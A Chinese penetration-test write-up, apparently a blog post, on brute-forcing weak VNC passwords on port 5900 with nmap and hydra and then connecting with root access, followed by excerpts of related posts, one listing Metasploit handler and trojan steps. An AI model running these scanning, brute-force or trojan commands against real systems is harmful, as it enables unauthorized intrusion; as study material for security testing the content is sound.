內網滲透 記一次5900埠弱口令爆破及入侵伺服器

2022-06-01 21:54:10 字數 1270 閱讀 3677

5900埠是遠端控制軟體vnc的預設監聽埠。

nmap具體使用方法可以參考:

(1)將收集到的活著的ip放到乙個txt資料夾中,利用:nmap -il ip.txt 進行批量掃瞄埠;

或者可以參考:

(2)使用:nmap -pr -on /home/xh/shentou/out.log 192.168.10.0/24 直接 掃瞄乙個網段內所有的ip,掃瞄的結果會儲存在out.log裡面;

hydra的使用參考:

(1)  hydra -p /home/xh/shentou/pwd_ssh1.txt -e n -t 1 192.168.10.13 vnc -v

-p,指定密碼列表

-e,嘗試null和相同(與使用者名稱相同)密碼

-t,以指定要執行的parralel程序的數量

-v,用於詳細

停止檢查相同的密碼,-en

(1)安裝xvnc4viewer:xvnc4viewer是個沒有圖形介面的程式,ubunut安裝的方法:~$ sudo apt install xvnc4viewer

(2)使用xvnc4viewer連線5900埠:

安裝完使用:在命令列輸入xvnc4viewer命令後在server :處會要求輸入遠端伺服器的ip位址和對應的埠號,如果不輸入埠號預設連線5900,輸入後回車,接下來會要求輸入遠端伺服器的vnc登入密碼,正確輸入密碼後會從新彈出乙個圖形登入介面。

可以看到已經入侵到服務內部了,而且還是root許可權。

參考:

記一次內網滲透

1.生成乙個木馬檔案 2.將生成的木馬上傳到目標機器上 3.啟動msfconsole。4.準備工作 1 use exploit multi handler 2 set lhost 192.168.20.11 3 set lport 1234 4 exploit 5 執行之前準備的木馬檔案 5.開始試...

記一次滲透測試

首先使用superscan掃了一下常用埠,沒有問題,只開了80,返回iis5.0,win2k差不離 掃瞄常見cgi iis漏洞,沒有問題,打了sp4補丁,到目前為止還不錯 到網頁上轉了轉,發現是用asp寫的,自然要掃掃sql注入了,也許你以為這次成功了吧,很不幸,沒有。自己做的網頁,自然沒有asp源...

記一次滲透測試某路由器

開局乙個路由器,滲透全靠莽,漏洞全靠猜!簡單記錄一下 某個廠商的路由器,網上找不到該型號路由器的相關資料,韌體也搜尋不出來!ssh埠開放,測試發現存在使用者名稱列舉漏洞,存在使用者root,爆破也沒有什麼結果 ssh登入提示警告,登入禁止,所以就算爆破出來密碼也沒啥用了,放棄之 有的zebra路由埠...